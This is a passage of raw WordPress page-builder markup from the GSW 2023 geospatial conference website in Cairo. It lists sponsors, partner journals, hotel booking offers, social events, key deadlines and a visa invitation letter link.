src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" 